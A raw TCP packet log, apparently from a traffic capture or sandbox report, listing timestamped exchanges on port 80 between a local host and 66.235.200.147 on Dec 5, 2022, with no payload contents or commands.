Dec 5, 2022 01:32:37.900671959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900690079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900693893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900716066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900717020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900741100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900747061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900762081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900763035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900783062 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900785923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900805950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900809050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900825024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900831938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900856018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900867939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900876045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900895119 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900898933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900919914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900923014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900939941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900943041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900962114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.900968075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.900990009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901005983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901012897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901031971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901036978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901058912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901062012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901077986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901088953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901101112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901112080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901133060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901153088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901154041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901176929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901181936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901199102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901207924 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901221037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901222944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901242971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901247978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901258945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901264906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901283026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901288986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901299953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901312113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901333094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901350021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901354074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901375055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901376963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901398897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901402950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901416063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901421070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901437998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901444912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901458979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901468992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901483059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901489973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901504040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901513100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901534081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901544094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901556015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901565075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901576996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901577950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901597023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901602030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901614904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901626110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901648045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901662111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901669025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901688099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901691914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901712894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901715040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901726007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901736975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901750088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901761055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901772976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901782990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901796103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901804924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901818991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901828051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901843071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901849985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901871920 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901875973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901894093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901906967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901917934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901937008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901938915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901962042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.901963949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901976109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.901987076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902002096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902009964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902026892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902033091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902044058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902055979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902070045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902077913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902091026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902101994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902112961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902123928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902137041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902146101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902160883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902168036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902182102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902190924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902204037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902220011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902225971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902242899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902255058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902265072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902277946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902287006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902304888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902311087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902326107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902332067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902345896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902354002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902367115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902376890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902390003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902399063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902412891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902420998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902434111 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902442932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902456045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902465105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902477980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902486086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902499914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902508020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902522087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902530909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902543068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902553082 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902565002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902575016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902587891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902597904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902610064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902618885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902631044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902642012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902654886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902662992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902676105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902686119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902698994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902708054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902720928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902730942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902743101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902751923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902765036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902774096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902786970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902796030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902808905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902817965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902831078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902839899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902853012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902862072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902880907 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902894020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902896881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902923107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902941942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902945042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902959108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902967930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.902982950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.902990103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903006077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903012037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903026104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903033972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903048038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903054953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903069973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903076887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903091908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903100967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903114080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903122902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903141022 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903146029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903158903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903168917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903182030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903191090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903204918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903213024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903227091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903234959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903249979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903256893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903271914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903279066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903299093 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903301001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903322935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.903326988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903337955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.903358936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920300007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920345068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920360088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920382023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920389891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920427084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920430899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920470953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920475006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920515060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920519114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920564890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920567989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920597076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920608997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920628071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920658112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920687914 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920706034 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920706987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920706987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920717955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920727968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920749903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920758963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920782089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920790911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920813084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920835018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920844078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920849085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920875072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920881033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920906067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920936108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920948029 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.920967102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.920979977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921000004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921019077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921030998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921040058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921062946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921082020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921097040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921099901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921128035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921138048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921159983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921166897 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921191931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921196938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921222925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921228886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921255112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921261072 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921288013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921293974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921319962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921328068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921351910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921356916 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921384096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921389103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921415091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921420097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921446085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921454906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921477079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921483040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921509981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921515942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921541929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921547890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921574116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921585083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921605110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921613932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921636105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921646118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921667099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921679974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921698093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921727896 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921747923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921749115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921757936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921791077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921802044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921822071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921833038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921854019 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921870947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921885014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921895981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921916008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921935081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921947002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921955109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.921978951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.921986103 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922009945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922017097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922043085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922046900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922074080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922080040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.922106981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.922110081 CET	49705	80	192.168.2.3	66.235.200.147
